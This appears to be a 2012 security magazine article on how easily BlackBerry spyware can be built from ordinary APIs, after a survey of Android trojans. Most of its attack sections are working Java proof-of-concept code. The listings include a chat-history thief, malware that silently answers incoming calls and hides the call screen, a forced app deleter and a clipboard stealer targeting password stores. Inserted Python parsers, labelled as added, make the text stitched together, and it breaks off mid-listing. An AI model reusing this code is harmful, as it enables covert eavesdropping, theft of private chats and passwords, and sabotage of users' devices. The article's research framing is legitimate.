This document discusses how easily user-mode rootkits and malware can be developed for BlackBerry devices by exploiting application programming interfaces (APIs) and oversight in privilege handling. It provides examples of real malware like Android Plankton and Geinimi that steal information by abusing APIs rather than exploiting vulnerabilities. The document argues that similar techniques could be used to create malware disguised as media players or chat applications for BlackBerry, which could steal files, conversations, and device information by accessing the unencrypted filesystem and chat logs. Code snippets are provided to demonstrate how this could be done by reading and writing files and monitoring communication history folders.
When developers API simplify user-mode rootkits development – part II
Yury Chemerkin
This series of articles is about the ease with which user-mode rootkits for BlackBerry can be developed. In a previous article, several cases were mentioned, along with ideas on how a mobile rootkit could easily be built at the application level by exploiting API and privilege escalation vulnerabilities or oversight. The cases covered the top trojans of the last two years, the first one being Android Plankton. Instead of giving access to hidden levels of this popular game, the malware sends information about the device to criminals and downloads other malicious programs.
Mobile Security
When developers API simplify user-mode rootkits development
This series of articles is about the ease with which user-mode rootkits for BlackBerry can be developed.
In a previous article, several cases were mentioned, along with ideas on how a mobile rootkit could easily be built at the application level by exploiting API and privilege escalation vulnerabilities or oversight. The cases covered the top trojans of the last two years, the first one being Android Plankton. Instead of giving access to hidden levels of this popular game, the malware sends information about the device to criminals and downloads other malicious programs.
From the Android Market alone, the infected program was downloaded more than 150,000 times, and from alternative sources the number of downloads reached 250,000. Android.Plankton does not exploit known vulnerabilities in the operating system to elevate its own privileges. Instead, it downloads its own service in the background immediately after the launch of the infected application, begins to collect information about the device and sends it to a remote server.
Another example was the Android malware DroidKungFu. This malware is capable of rooting vulnerable Android phones and may successfully evade detection by current mobile anti-virus software. The malware was identified in four Android apps that had been circulated among at least eight alternative Chinese app markets and forums. It adds a new service and a receiver to the infected app; the receiver is notified when the system finishes booting, so that it can automatically launch the service without user interaction.
The Geinimi trojan includes the capability to:
• Read and collect SMS messages
• Send and delete selected SMS messages
• Pull all contact information and send it to a remote server (number, name, the time they were last contacted)
• Place a phone call
• Silently download files
• Launch a web browser with a specific URL
Geinimi has three different methods of starting itself. The trojan will first launch itself as its own service. The service allows the trojan to start while the host application appears to be functioning normally. The two other ways Geinimi starts revolve around BroadcastReceivers reacting to Android events: the trojan will wake itself up on an incoming SMS message. Geinimi encrypts the embedded data, payload and all communications; however, the encryption is weak. The values in the request for commands can be used by the command-and-control server to identify information about infected devices. The longitude and latitude can then be used to track the location of this specific user. Also, the trojan gathers a list of applications and their activities on the device, sends an SMS to any recipient, deletes SMSs, lists SMSs to specific contacts, lists contacts and their information, calls any number, silently downloads files and launches a web browser with a specific URL.
An SMS trojan called Trojan-SMS.AndroidOS.FakePlayer, once installed, sends out SMS messages without the user’s knowledge or consent. Users are prompted to install a small file of around 13 KB (have you ever seen such a small media player?). The trojan bundled with it then begins texting premium-rate phone numbers. The criminals are actually the ones operating these numbers, so they end up collecting the money via charges to the victims’ accounts.
04/2012
Listing 1. API routines used to build the “MEDIA PLAYER IO (Input/Output)” malware
    import java.io.DataInputStream;
    import java.io.IOException;
    import java.io.OutputStream;
    import java.util.Enumeration;                     // used by Listing 3
    import java.util.Vector;                          // used by Listing 3
    import javax.microedition.io.Connector;
    import javax.microedition.io.file.FileConnection;
    import net.rim.device.api.io.IOUtilities;
    import net.rim.device.api.ui.component.Dialog;    // used by writeFile() in Listing 2a
Listing 2a. Code example of how to read and write files [malware “MEDIA PLAYER IO (Input/Output)”]
    public static byte[] readFile(String FullName)
    /// FullName includes the full path to the file, with file name and file extension
    {
        // array of data you want to return (read)
        byte[] data = null;
        FileConnection fconn = null;
        DataInputStream is = null;
        try
        {
            // open the file read-only and pull the whole content into memory
            fconn = (FileConnection) Connector.open(FullName, Connector.READ);
            is = fconn.openDataInputStream();
            data = IOUtilities.streamToBytes(is);
        }
        catch (IOException e)
        { }
        finally
        {
            // release the stream and the connection whatever happened above
            try
            {
                if (null != is)
                {
                    is.close();
                }
                if (null != fconn)
                {
                    fconn.close();
                }
            }
            catch (IOException e)
            { }
        }
        return data;
    }

    public static void writeFile(String FullName, byte[] data)
    /// FullName includes the full path to the file, with file name and file extension
    // data is the array you want to put into the file
    {
        FileConnection fconn = null;
        OutputStream os = null;
        try
        {
            fconn = (FileConnection) Connector.open(FullName, Connector.READ_WRITE);
            if (!fconn.exists())
            {
                // create the file if one doesn’t exist
                fconn.create();
            }
            // open the stream at the current end of the file, so data is appended
            os = fconn.openOutputStream(fconn.fileSize());
            os.write(data);
        }
        catch (Exception e)
        { Dialog.alert(e.getMessage()); }
        finally
        {
            try
            {
                if (null != os)
                {
                    os.close();
                }
                if (null != fconn)
                {
                    fconn.close();
                }
            }
            catch (IOException e)
            { Dialog.alert(e.getMessage()); }
        }
    }
www.hakin9.org/en
Listing 3. File and folder tree walk (briefly)
    Vector Path = new Vector();
    Path.addElement((String) "file:///SDCard/BlackBerry/im");
    Path.addElement((String) "...");    // repeated several times, once per folder to walk
    Enumeration Path_enum = Path.elements();
    while (Path_enum.hasMoreElements())
    {
        String current_path = (String) Path_enum.nextElement();
        // do something with current_path
    }
The trojan spyware application known as Zitmo is designed to steal people’s financial data by listening to all incoming SMS messages and forwarding them to a remote web server. That is a security risk, as some banks now send mTANs via SMS as a one-time password for authentication. By intercepting these passwords, it can not only create fraudulent money transfers but also verify them.
The trojan program “OddJob” does not require fraudsters to log into a user’s online bank account to steal from it. Instead, the malware is designed to hijack a user’s online banking session in real time by stealing session ID tokens. By stealing the tokens and embedding them into their own browsers, fraudsters can impersonate a legitimate user and access accounts while the user is still active online. The access allows fraudsters to then conduct whatever banking operations the account holder can perform. This approach is different from typical man-in-the-browser attacks, where attackers use trojans to steal login credentials that are then used to break into online accounts. The second interesting feature of OddJob is its ability to keep an online banking session open and live even after users think they have logged out of their account. This allows criminals to extract money and continue other fraudulent activity even after the user thinks the session has ended.
BlackBerry Opportunity
Is it really difficult to bring these vulnerabilities to BlackBerry devices? We are going to see how easy it really is to port these techniques to BlackBerry devices.
The first two ideas and proof-of-concepts are about the BlackBerry file system. As you may know, BlackBerry can encrypt the whole file system as well as removable storage cards. Talking about an encrypted file system, you should understand that this feature makes sense only when all storage cards and memory are removed from the device to extract information, as in forensic cases. Instead, when you rely on live spying, you will get much more information than by trying to decrypt it or obtain the password.
First malware concept, the so called media player,
based not so much on human bugs as it is on GUI
bugs. Unfortunately, humans are not the last point of
04/2012
5. File Paths should be monitored
/Device/Home/User/ – if information stored on internal memory
/MediaCard/BlackBerry/ – if information stored on external memory
../IM/AIM/USERNAME/history/ – AIMs history in csv format
../IM/BlackBerryMessenger/PIN/history/ – BBMs history in csv format
../IM/GoogleTalk/USERNAME/history/ – GTalks history in csv format
../IM/Yahoo/USERNAME/history/ – YMessengers history in csv format
../IM/WindowsLive/USERNAME/history/ – WLives history in csv format
../pictures – Manully added pic or screenshoted data
../camera – Photo captured data
../videos – Video captured data
../voice notes – Voice captured data
defense when we talk about vulnerabilities, trojans,
etc. Our behaviour is based on traditions of the past
sometimes, as well as tools which used to change with
age. In the past, access to files used to be strictly via
DOS/Unix system; nowadays we have an aggregation
of folders like Music, Photos, Photo-Camera’s folder,
or Videos. The GUI was developed as a result of the
desire for a convenient way to access files. Taking the
discussion to file access on our smart phones, audio
notes, photos, videos, music, and camera’s data are
stored in one place (more correctly in two places, on
internal storage and external storage like SD-card)
and applications are allowed to access these folder
paths to extract data in real-time; moreover API access to those same folders are easily obtained. Also,
they may associate their listeners with a specific file
format like .AMR which used to store your BlackBerry
audio notes. They are often stored in the “voicenotes”
folder, named as VN-20120319-xxxx.AMR. As you can
see, you do not need to extract its properties to know
when it was recorded; you do not even need to link
(programmatically) the folder with type of file (logical
level) because “VN” is a voice note. Video files are recorded by the device and named “VID-YYYYMMDDXXXXXX.3GP” as voice note or picture file. Photos are
named as IMG20120103-xxxx. To talk about a geo-tag
per file, a “Moskva” prefix in added to file name. It is
obvious why developers store the name of the file as
the city part, date part and increment part. Continuous
numbering is allowed in these cases, but why isn’t it
developed with the increment part then the hash part
at the end of file name (XXXX-hash-dot-extension)?
Several file-systems differ in the way files should be
sorted, but developers are still able to ask device owners what they prefer. Doing this makes things simple, easier to control and a bit more secure, don’t you
agree? Of course, our media player as malware must
have a network connection to get updates despite the
fact that each BlackBerry device receives update notifications from AppWorld and OS updates should be received via USB-cable by synchronizing with the BlackBerry Desktop Software. Instead, our application may
grab news from an official site, update news, offers to
share music status and steal and send cached information (Listing 1-Listing 3).
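The naming convention above leaks the recording date, the media kind and (with the city prefix) a location from the file name alone. The following added example, which is not code from the article, shows how much timeline a spy or an investigator recovers without opening a single file. The sample listing is constructed here; the exact spelling of the geo-tag prefix ("Moskva-" with a hyphen) and the .jpg extension for IMG files are assumptions, since the article does not show them.

```python
"""Timeline from BlackBerry media file names (added example, not article code)."""
import re
from datetime import date

# Constructed sample listing of the media folders under /Device/Home/User and
# /MediaCard/BlackBerry. The "Moskva-" geo prefix spelling is an assumption.
SAMPLE_LISTING = [
    "voicenotes/VN-20120319-0001.AMR",
    "voicenotes/VN-20120319-0002.AMR",
    "videos/VID-20120103-000012.3GP",
    "camera/IMG20120103-0004.jpg",
    "camera/Moskva-IMG20120105-0005.jpg",
    "pictures/wallpaper.png",            # manually added picture: no date in the name
]

KIND = {"VN": "voice note", "VID": "video", "IMG": "photo"}

NAME_RE = re.compile(
    r"^(?:(?P<geo>[A-Za-z]+)-)?"    # optional geo-tag prefix, e.g. Moskva-
    r"(?P<kind>VN|VID|IMG)-?"       # VN-..., VID-..., IMG... (no dash after IMG)
    r"(?P<ymd>\d{8})-"              # YYYYMMDD
    r"(?P<seq>\d+)\.(?P<ext>\w+)$"  # increment part and extension
)


def parse_media_name(path):
    """Return (date, kind, seq, geo) recovered from the file name alone, or None."""
    name = path.rsplit("/", 1)[-1]
    m = NAME_RE.match(name)
    if not m:
        return None
    ymd = m.group("ymd")
    try:
        when = date(int(ymd[:4]), int(ymd[4:6]), int(ymd[6:8]))
    except ValueError:          # e.g. month 13: not a real capture name
        return None
    return when, KIND[m.group("kind")], int(m.group("seq")), m.group("geo")


def timeline(paths):
    """Chronological list of (date, kind, seq, geo, path) for every name that leaks a date."""
    rows = []
    for p in paths:
        parsed = parse_media_name(p)
        if parsed:
            rows.append(parsed + (p,))
    rows.sort(key=lambda r: (r[0], r[2]))
    return rows


def undated(paths):
    """Files whose name gives nothing away; only their metadata would."""
    return [p for p in paths if parse_media_name(p) is None]


if __name__ == "__main__":
    for when, kind, seq, geo, path in timeline(SAMPLE_LISTING):
        print(when, kind, seq, geo or "-", path)
```

Run it against a real directory listing taken from the device to see the same ordering the malware gets for free; anything that ends up in undated() still has its capture date in the file metadata, but at least that requires opening the file.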
The second malware concept covers BlackBerry chats. If you turn on the option to save chat history to internal storage (device) or external storage (SD card), you are reminded that you should ask your interlocutor to agree to the recording. By the way, the setting is not per contact; it is a global feature, so that reminder makes little sense, as you see. By default this feature is turned off. If you turn saving on, you will be surprised to find that your data is stored in clear text. Don't assume that only Google, Yahoo or other non-BlackBerry chats go unencrypted: BlackBerry Messenger chats are not encrypted either. Likewise, Shape IM+ for Linux relies on its root folder alone, without encryption. Note that the Yahoo Messenger, AIM (AOL) Messenger, Windows Live Messenger, Google Talk and BlackBerry Messenger clients are all developed by RIM. The only "native security" is that the device itself has no viewer for the .CSV format except special programs. Just copy the file to a PC and open it with Notepad; to see the chats formatted, open it with Excel or OpenOffice.

Figure 1. Logged BlackBerry Conversation
Figure 2. Window of BlackBerry Conversation
Figure 3. Logged Google Conversation
Figure 4. Window of Google Conversation
Figure 5. Logged WinLive Conversation
Figure 6. Window of WinLive Conversation
Figure 7. Logged Yahoo Conversation
Figure 9. Logged AIM (AOL) Conversation

Chat Details
All IM chats from the clients developed by RIM, once marked to be saved, are located under the same paths:
• INTERNAL STORAGE: file:///store/home/user/im
• EXTERNAL STORAGE: file:///SDCard/BlackBerry/im
Then an IM folder per native IM client:
• AIM
• BlackBerry Messenger
• Google Talk
• Windows Live
• Yahoo
Then a folder named after your own account, such as:
• AIM Account: yury.chemerkin@aim.com
• Google Account: yury.chemerkin@gmail.com
• Windows Live Account: yury.chemerkin@hotmail.com
• Yahoo Account: yury.chemerkin
• BlackBerry Account: 23436780 (BlackBerry PIN)
Then a "history" folder containing .CSV files named after the interlocutor's account, like yury.chemerkin@gmail.com. Conference/group chat folders are placed here too:
• AIM: Conferences
• Google: Conferences
• Windows Live: Conferences
• Yahoo: Conferences
• BlackBerry: Group Chats

BlackBerry chat CSV file format
• Date/Time – YYYYMMDDHHMMSSMS
• PIN Sender – HEX VALUE
• PIN Receiver – HEX VALUE
• Data – STRING

Non-BlackBerry chat CSV file format
• Date/Time – YYYYMMDDHHMMSSMS
• ID Sender – STRING
• ID Receiver – STRING
• Data – STRING

Summary
• All clients store chats the same way
• You need to turn on the saving option
• Notepad or Excel is enough to read them (Figure 1-Figure 10, Listing 4)
• File-system ciphering does nothing against live spying
• Chats are stored in clear text
• You can't read them on the device itself
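Given the two CSV layouts above, reconstructing a conversation from the saved history is a few lines of parsing. The following added example (not code from the article) parses both the BlackBerry Messenger layout, where sender and receiver are PINs, and the non-BlackBerry layout, where they are account IDs, skips malformed rows and merges several histories into one timeline. The sample rows are constructed; the comma delimiter, three millisecond digits in the Date/Time field and the eight-hex-character PIN check are assumptions, since the article only gives the column order and types.

```python
"""Parse saved BlackBerry IM history CSVs (added example, not article code)."""
import csv
import io
from datetime import datetime

# Constructed sample rows in the two layouts described in the article.
# Delimiter, millisecond width and column order beyond the table are assumptions.
BBM_CSV = (
    "20120319143005123,2A3B4C5D,23436780,hi there\n"
    "20120319143012456,23436780,2A3B4C5D,\"hello, how are you?\"\n"
)
GTALK_CSV = (
    "20120319150000001,friend@gmail.com,yury.chemerkin@gmail.com,lunch?\n"
    "bad line without enough fields\n"
    "20120319150045789,yury.chemerkin@gmail.com,friend@gmail.com,sure\n"
)


def parse_timestamp(field):
    """YYYYMMDDHHMMSS followed by milliseconds -> datetime; ValueError if malformed."""
    if len(field) < 14 or not field.isdigit():
        raise ValueError("bad timestamp: %r" % field)
    ts = datetime.strptime(field[:14], "%Y%m%d%H%M%S")
    ms = int(field[14:].ljust(3, "0")[:3])      # assumption: 3 millisecond digits
    return ts.replace(microsecond=ms * 1000)


def is_pin(s):
    """BlackBerry PINs are 8 hex characters (assumption used for validation)."""
    return len(s) == 8 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_history(text, bbm):
    """Return [{'when','sender','receiver','text'}] for one history file.

    bbm=True validates sender/receiver as PINs (BlackBerry layout); bbm=False
    treats them as account IDs (non-BlackBerry layout). Malformed rows are skipped
    rather than aborting, so a partly corrupt file still yields what it can.
    """
    rows = []
    for rec in csv.reader(io.StringIO(text)):
        if len(rec) < 4:
            continue
        try:
            when = parse_timestamp(rec[0])
        except ValueError:
            continue
        sender, receiver = rec[1], rec[2]
        if bbm and not (is_pin(sender) and is_pin(receiver)):
            continue
        rows.append({"when": when, "sender": sender, "receiver": receiver,
                     "text": ",".join(rec[3:])})
    return rows


def merge_timeline(*histories):
    """Merge parsed histories from several clients into one chronological list."""
    return sorted((r for h in histories for r in h), key=lambda r: r["when"])


def participants(rows):
    return sorted({r["sender"] for r in rows} | {r["receiver"] for r in rows})


if __name__ == "__main__":
    for r in merge_timeline(parse_history(BBM_CSV, bbm=True),
                            parse_history(GTALK_CSV, bbm=False)):
        print(r["when"].isoformat(), r["sender"], "->", r["receiver"], r["text"])
```

Point it at the history/ folders listed in Chat Details and it produces the same cross-client timeline an attacker would exfiltrate; the same parser doubles as a triage tool when you need to show a device owner exactly what was sitting in clear text.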
Figure 8. Window of Conversation
Figure 10. Window of AIM (AOL) Conversation

The third malware concept is based on several APIs acting in stealth mode. First, catch the incoming call event; second, simulate an answer by simulating a press of the answer button; then hide the caller screen and get back to the home screen by simulating the Escape button. Answering refers to Keypad.KEY_SEND; to press and release the button you simulate KeyCodeEvent.KEY_DOWN followed by KeyCodeEvent.KEY_UP. Before you do this, understand that at least one second should pass after the incoming event so that the native caller screen has been drawn on top of the screen you manage. Then, once the call is accepted, you hide it via Keypad.KEY_ESCAPE; however, when you press Escape you are asked whether or not to go to the home screen. Therefore the malware has to simulate agreement via Keypad.KEY_ENTER to stay out of the user's sight. That is as far as it goes: there is no other API for drawing your own caller screen and managing incoming calls. To take simulated physical input further, you can read my second article (Hakin9, Is Data Secure On The Password Protected BlackBerry Device). It is easy to put a symbol into a text field, while entering a string one symbol at a time and moving the trackwheel is more awkward, although it may be enough to input passwords (Figure 11-Figure 14, Listing 5).

Listing 4. IM Chat Thief

package blackberryChatThief;

import java.io.IOException;
import java.io.InputStream;
import java.util.Enumeration;
import java.util.Vector;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import net.rim.device.api.io.IOUtilities;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.component.Dialog;
import net.rim.device.api.ui.container.MainScreen;

public class BlackBerryChatThiefScreen extends MainScreen implements FieldChangeListener
{
    private ButtonField checkButton;
    private ButtonField exitButton;

    // Roots under which the native IM clients keep saved history (see Chat Details)
    private static final String[] ROOTS = {
        "file:///store/home/user/im/",        // internal storage
        "file:///SDCard/BlackBerry/im/"       // external storage
    };

    public BlackBerryChatThiefScreen()
    {
        setTitle("BlackBerry Chat Thief Application");
        checkButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
        checkButton.setLabel("Steal your own chat :)");
        checkButton.setChangeListener(this);
        add(checkButton);
        exitButton = new ButtonField(ButtonField.CONSUME_CLICK | ButtonField.FIELD_HCENTER);
        exitButton.setLabel("Exit");
        exitButton.setChangeListener(this);
        add(exitButton);
    }

    public void fieldChanged(Field field, int param)
    {
        if (field == checkButton)
        {
            String string_result;
            try
            {
                // Collect every history/*.csv under <root>/<IM client>/<account>/history/
                Vector Path = new Vector();
                for (int i = 0; i < ROOTS.length; i++)
                {
                    collectHistory(ROOTS[i], Path);
                }
                // Read each file; the chats are stored in clear text
                StringBuffer sb = new StringBuffer();
                for (int i = 0; i < Path.size(); i++)
                {
                    String current_path = (String) Path.elementAt(i);
                    sb.append(current_path).append("\n").append(readFile(current_path)).append("\n");
                }
                string_result = sb.toString();
            }
            catch (Exception ex)
            {
                string_result = ex.toString() + "||" + ex.getMessage();
            }
            Dialog.alert(string_result);
        }
        else if (field == exitButton)
        {
            System.exit(0);
        }
    }

    // Walk root -> IM client folder -> account folder -> history/ and collect the CSV paths
    private static void collectHistory(String root_dir, Vector out) throws IOException
    {
        FileConnection rootConn = (FileConnection) Connector.open(root_dir, Connector.READ);
        if (!rootConn.exists())
        {
            rootConn.close();
            return;
        }
        Enumeration ims = rootConn.list();
        while (ims.hasMoreElements())
        {
            String current_im = root_dir + ims.nextElement();          // e.g. BlackBerryMessenger/
            FileConnection imConn = (FileConnection) Connector.open(current_im, Connector.READ);
            if (imConn.isDirectory())
            {
                Enumeration ids = imConn.list();
                while (ids.hasMoreElements())
                {
                    String current_id = current_im + ids.nextElement();   // account folder, e.g. PIN/
                    String history = current_id + "history/";
                    FileConnection histConn = (FileConnection) Connector.open(history, Connector.READ);
                    if (histConn.exists())
                    {
                        Enumeration convs = histConn.list("*.csv", false);
                        while (convs.hasMoreElements())
                        {
                            String current_conv = history + convs.nextElement();
                            out.addElement(current_conv);
                        }
                    }
                    histConn.close();
                }
            }
            imConn.close();
        }
        rootConn.close();
    }

    private static String readFile(String path) throws IOException
    {
        FileConnection fconn = (FileConnection) Connector.open(path, Connector.READ);
        InputStream is = fconn.openInputStream();
        try
        {
            return new String(IOUtilities.streamToBytes(is));
        }
        finally
        {
            is.close();
            fconn.close();
        }
    }
}

Figure 11. Before Call
Figure 12. Incoming Call
Figure 13. Answering
Figure 14. Escaping to the Home Screen

Listing 5. Caller Malware

package blackBerryPhoneEmulation;

import net.rim.blackberry.api.phone.Phone;
import net.rim.blackberry.api.phone.PhoneCall;
import net.rim.blackberry.api.phone.PhoneListener;
import net.rim.device.api.system.EventInjector;
import net.rim.device.api.system.EventInjector.KeyCodeEvent;
import net.rim.device.api.ui.Keypad;
import net.rim.device.api.ui.UiApplication;
import net.rim.device.api.ui.container.MainScreen;

public class BlackBerryPhoneEmulationApp extends UiApplication implements PhoneListener
{
    // Time to let the native phone screen be drawn before keys are injected
    int sleep_time = 1000;

    public static void main(String[] args)
    {
        BlackBerryPhoneEmulationApp theApp = new BlackBerryPhoneEmulationApp();
        theApp.enterEventDispatcher();
    }

    public BlackBerryPhoneEmulationApp()
    {
        pushScreen(new BlackBerryPhoneEmulationScreen());
        Phone.addPhoneListener(this);
    }

    public void close()
    {
        Phone.removePhoneListener(this);
        System.exit(0);
    }

    // Incoming call: wait for the caller screen, then answer by simulating the Send key
    public void callIncoming(int callId)
    {
        final PhoneCall call = Phone.getCall(callId);
        final String number = call.getDisplayPhoneNumber(); // caller id is available here if wanted
        EventInjector.KeyCodeEvent pressKey =
            new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char) Keypad.KEY_SEND, 0);
        EventInjector.KeyCodeEvent releaseKey =
            new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char) Keypad.KEY_SEND, 0);
        try
        {
            Thread.sleep(sleep_time);
        }
        catch (InterruptedException e) {}
        EventInjector.invokeEvent(pressKey);
        EventInjector.invokeEvent(releaseKey);
    }

    // Call connected: leave the in-call screen and accept the "go to Home screen?" prompt
    public void callConnected(int callId)
    {
        EventInjector.KeyCodeEvent pressKey =
            new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char) Keypad.KEY_ESCAPE, 0);
        EventInjector.KeyCodeEvent releaseKey =
            new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char) Keypad.KEY_ESCAPE, 0);
        try
        {
            Thread.sleep(sleep_time); // Waiting for the caller screen to be drawn
        }
        catch (InterruptedException e) {}
        EventInjector.invokeEvent(pressKey);
        EventInjector.invokeEvent(releaseKey);
        // Escaping to the Home Screen

        pressKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_DOWN, (char) Keypad.KEY_ENTER, 0);
        releaseKey = new EventInjector.KeyCodeEvent(KeyCodeEvent.KEY_UP, (char) Keypad.KEY_ENTER, 0);
        try
        {
            Thread.sleep(sleep_time); // Waiting for the prompt screen to be drawn
        }
        catch (InterruptedException e) {}
        EventInjector.invokeEvent(pressKey);
        EventInjector.invokeEvent(releaseKey);
        // Accepting: escape to the Home Screen
    }

    // Remaining PhoneListener callbacks are not needed
    public void callAdded(int callId) {}
    public void callAnswered(int callId) {}
    public void callConferenceCallEstablished(int callId) {}
    public void callDirectConnectConnected(int callId) {}
    public void callDirectConnectDisconnected(int callId) {}
    public void callDisconnected(int callId) {}
    public void callEndedByUser(int callId) {}
    public void callFailed(int callId, int reason) {}
    public void callHeld(int callId) {}
    public void callInitiated(int callid) {}
    public void callRemoved(int callId) {}
    public void callResumed(int callId) {}
    public void callWaiting(int callid) {}
    public void conferenceCallDisconnected(int callId) {}
}

// Minimal screen so the application has something to push
class BlackBerryPhoneEmulationScreen extends MainScreen
{
    BlackBerryPhoneEmulationScreen()
    {
        setTitle("BlackBerry Phone Emulation");
    }
}

Figure 15. App list with Victim app
Figure 16. Details of Victim Apps
Figure 17. App List with deleted victim app
Figure 18. Details of deleted victim app

The fourth malware concept is about destructive interaction. What is the common thesis when someone talks about security? A security component must not be deletable, because removing it brings down the security wall. So why shouldn't malware delete every application and module installed on your device? Some applications consist of several modules, and with one module removed they crash after the next reboot. Another attack vector: BlackBerry Enterprise Server offers application control by re-sending modules to selected devices according to IT policy, but if the malware turns off the wireless radio to crash the device, no policy saves it. When you install an application you are asked which permissions to grant it. As you know from my articles about screenshot capture, the device should sometimes ask which windows are allowed to interact with screenshots and which are not. This case is the same, and all you need to delete other applications is their name and permission to interact with the Application Manager. How do you get data about applications? The easiest way to interrupt the user's flow is to grab the applications active at that moment via ApplicationManager.getApplicationManager().getVisibleApplications(). Once it has the application list, the malware grabs the LocalizedName and ModuleHandle to find them in the Application Manager's lists and deletes them by ModuleHandle. That's all (Figure 15-Figure 18, Listing 6).

The fifth malware concept deals with the Clipboard. From the Android malware cases I retold at the beginning, you learned that passwords may be extracted from SMS or from GET/POST requests. My case refers to Password Keeper and BlackBerry Wallet, both developed by RIM, native and pre-installed by default. The first is designed to keep passwords; the second keeps not only passwords but also banking data. Essential information also sits in BlackBerry backups: Elcomsoft BlackBerry Backup Explorer lets forensic specialists investigate the content of BlackBerry devices by extracting, analyzing, printing or exporting the content of a backup produced with BlackBerry Desktop Software. But Elcomsoft only works with the exported data that you back up. RIM made a "good" security decision to restrict any attempt to access the clipboard while these applications are active: if you try to grab data you get the error message "Unauthorized attempt to attach to this application." Don't panic, because as soon as the user minimizes or closes the application, extraction succeeds. If you want to know whether BlackBerry Wallet (or Password Keeper) is running right now, use the code example on how to find an application (Figure 19-Figure 20, Listing 7).

Screenshotting has been discussed many times, so I only highlight that "this feature" easily bypasses the security flow when the user restricts other permissions. For example, if the user denies the GEO permission, you listen for active applications and catch a screenshot of the map the user is viewing at that moment. When the map application starts it often shows the previous location, so it is a kind of timeline (Figure 21 and Listing 8).

Listing 6. Code example: how to find an application among the set of running applications and how to delete it

package blackBerryDeleterpackage;

import net.rim.device.api.system.ApplicationDescriptor;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.system.CodeModuleManager;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.component.TextField;
import net.rim.device.api.ui.container.MainScreen;

public final class BlackBerryDeleterScreen extends MainScreen implements FieldChangeListener
{
    ButtonField bt_find = null;
    ButtonField bt_delete = null;
    TextField tf2 = null;
    String stf2 = "";
    int victim_handle = 0;   // module handle of the application picked for deletion

    public BlackBerryDeleterScreen()
    {
        // Set the displayed title of the screen
        setTitle("BlackBerryDeleterTitle");
        bt_find = new ButtonField();
        bt_delete = new ButtonField();
        tf2 = new TextField();
        bt_find.setLabel("FIND APP");
        bt_delete.setLabel("DEL APP");
        bt_find.setChangeListener(this);
        bt_delete.setChangeListener(this);
        tf2.setLabel("INFO\r\n");
        add(tf2);
        add(bt_find);
        add(bt_delete);
    }

    public void fieldChanged(Field field, int context)
    {
        if (field == bt_find) // BUTTON "FIND APPLICATION"
        {
            try
            {
                // Our own module handle, so we never pick ourselves as the victim
                int curr_app = ApplicationDescriptor.currentApplicationDescriptor().getModuleHandle();
                ApplicationDescriptor[] descs =
                    ApplicationManager.getApplicationManager().getVisibleApplications();
                stf2 = "";
                for (int i = 0; i < descs.length; i++)
                {
                    ApplicationDescriptor desc = descs[i];
                    int handle = desc.getModuleHandle();
                    if (handle == curr_app) continue;
                    // Localized name and module handle are all that is needed to find it again
                    stf2 += desc.getLocalizedName() + " : " + handle + "\r\n";
                    victim_handle = handle;   // the last foreign visible application becomes the victim
                }
                tf2.setText(stf2);
            }
            catch (Exception e)
            {
                tf2.setText("ERROR: " + e.getMessage());
            }
        }
        else if (field == bt_delete) // BUTTON "DELETE APPLICATION"
        {
            if (victim_handle != 0)
            {
                // Delete the module by handle; force=true removes it even while it is in use.
                // The device may need a reset before the module is really gone.
                boolean ok = CodeModuleManager.deleteModuleEx(victim_handle, true);
                tf2.setText(stf2 + (ok ? "deleted " : "failed to delete ") + victim_handle + "\r\n");
                CodeModuleManager.promptForResetIfRequired();
            }
        }
    }
}

Figure 19. BB Wallet. Creating & Stealing
Figure 20. BB Wallet. Showing & Stealing

Listing 7. Clipboard exploitation (how to extract data to steal it, and how to put data to mislead someone)

import net.rim.device.api.system.Clipboard;
import net.rim.device.api.ui.component.TextField;
import net.rim.device.api.ui.container.MainScreen;

public final class BlackBerryClipboardScreen extends MainScreen
{
    public BlackBerryClipboardScreen()
    {
        setTitle("BlackBerryClipboardTitle");
        Clipboard clipb = Clipboard.getClipboard();
        TextField tf1 = new TextField();
        add(tf1);
        TextField tf2 = new TextField();
        add(tf2);
        TextField tf3 = new TextField();
        add(tf3);

        // SHOW CLIPBOARD AS STRING OBJECT
        tf1.setLabel("to_string : < " + clipb.toString() + " >");

        String str = "";
        try
        {
            str = (String) clipb.get();   // GET CLIPBOARD DATA
        }
        catch (Exception e) { }
        tf2.setLabel("getted : < " + str + " >");   // SHOW THAT CLIPBOARD DATA HAS BEEN STOLEN

        try
        {
            clipb.put("PUT");             // CLIPBOARD SET BY WORD "PUT"
        }
        catch (Exception e) { }

        try
        {
            str = (String) clipb.get();   // GET NEW CLIPBOARD DATA
        }
        catch (Exception e) { }
        tf3.setLabel("getted : < " + str + " >");   // SHOW THAT CLIPBOARD HAS BEEN SET BY WORD "PUT"
    }
}

Figure 21. ScreenShot of BlackBerry Map

Listing 8. Message misleading

import java.io.DataInputStream;
import java.io.IOException;
import java.util.Date;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.AddressException;
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.MessagingException;
import net.rim.blackberry.api.mail.Multipart;
import net.rim.blackberry.api.mail.NoSuchServiceException;
import net.rim.blackberry.api.mail.PINAddress;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;
import net.rim.blackberry.api.mail.SupportedAttachmentPart;
import net.rim.blackberry.api.mail.TextBodyPart;
import net.rim.device.api.io.IOUtilities;
import net.rim.device.api.io.MIMETypeAssociations;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.component.Dialog;
